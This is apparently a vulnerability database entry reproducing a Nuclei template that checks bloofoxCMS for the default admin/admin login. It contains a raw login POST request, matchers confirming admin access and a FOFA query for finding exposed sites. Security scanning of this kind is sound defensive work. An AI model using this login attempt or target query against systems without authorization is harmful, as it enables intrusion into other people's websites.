漏洞描述
bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
bloofoxcms-default-login: bloofoxCMS - Default Login
PoC代码[已公开]
id: bloofoxcms-default-login
info:
name: bloofoxCMS - Default Login
author: theamanrawat
severity: high
description: |
bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.bloofox.com/automated_setup.113.html
- https://www.bloofox.com
classification:
cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: bloofox
product: bloofoxcms
fofa-query: "Powered by bloofoxCMS"
tags: bloofox,cms,default-login,vuln
http:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- contains(body, 'bloofoxCMS Admincenter')
- status_code == 200
condition: and
# digest: 490a0046304402203b4335c4837d3196de2c8b4097e87c046ebe31d4d618b6c160f3ef220025515602203e85f611646bfd728b450a036d0cf4c25e40b363e1db74769e0563a8d6a6e5e6:922c64590222798bb761d5b6d8e72950